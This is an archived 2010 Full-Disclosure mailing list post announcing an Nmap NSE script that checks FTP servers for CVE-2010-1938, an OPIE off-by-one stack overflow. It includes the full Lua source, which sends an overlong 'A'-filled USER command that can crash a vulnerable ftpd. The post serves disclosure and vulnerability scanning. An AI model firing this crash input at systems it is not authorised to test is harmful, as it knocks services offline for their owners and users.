[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] ftp-libopie.nse in response to CVE-2010-1938
- To: full-disclosure <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] ftp-libopie.nse in response to CVE-2010-1938
- From: Henri Salo <henri@xxxxxxx>
- Date: Thu, 27 May 2010 21:07:34 +0300
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
A vulnerability that has been published today affects the OPIE
Authentication System (libopie).
According to the researchers it could hit many systems like
- - OpenSuSE
- - wu-ftpd
- - mod_opie
- - PAM
- - openssh (modified by FreeBSD/DragonflyBSD Team)
- - sudo
- - opiesu
- - popper
- - Probably much more...
Original advisory :
http://securityreason.com/achievement_securityalert/87 See also :
http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc
Please find attached their PoC as a script for Nmap.
Example Output :
- -- PORT STATE SERVICE
- -- 21/tcp open ftp
- -- | ftp-libopie: Likely prone to CVE-2010-1938 (OPIE off-by-one stack
overflow)
- -- |_See
http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc
A.G.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.12 (GNU/Linux)
Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org/
iEYEARECAAYFAkv+rS8ACgkQ3aDTTO0ha7j4igCffydmk9Y+U6ocVSNI5RwopoGh
vc0AniRSZZEkW5vgImS4czZsTTzS1bqf
=No6K
-----END PGP SIGNATURE-----
description = [[
Checks if an FTPd is prone to CVE-2010-1938 (OPIE off-by-one stack overflow).
Vulnerability discovered by Maksymilian Arciemowicz and Adam 'pi3' Zabrocki
]]
---
-- @output
-- PORT STATE SERVICE
-- 21/tcp open ftp
-- | ftp-libopie: Likely prone to CVE-2010-1938 (OPIE off-by-one stack overflow)
-- |_See http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc
author = "Ange Gutek"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html";
categories = {"intrusive"}
require "shortport"
portrule = shortport.port_or_service(21, "ftp")
action = function(host, port)
local socket = nmap.new_socket()
local result
-- If we use more that 31 chars for username, ftpd will crash (quoted from the
advisory).
local user_account = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
local status = true
local err_catch = function()
socket:close()
end
local try = nmap.new_try(err_catch)
socket:set_timeout(10000)
try(socket:connect(host.ip, port.number, port.protocol))
-- First, try a safe User so that we are sure that everything is ok
local payload = "USER opie\r\n"
try(socket:send(payload))
status, result = socket:receive_lines(1);
if status and not (string.match(result,"^421")) then
-- Second, try the vulnerable user account
local payload = "USER " .. user_account .. "\r\n"
try(socket:send(payload))
status, result = socket:receive_lines(1);
if status then
return
else
-- if the server does not answer anymore we may have reached a stack
overflow condition
return "Likely prone to CVE-2010-1938 (OPIE off-by-one stack
overflow)\nSee http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc";
end
else
return
end
socket:close()
end
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/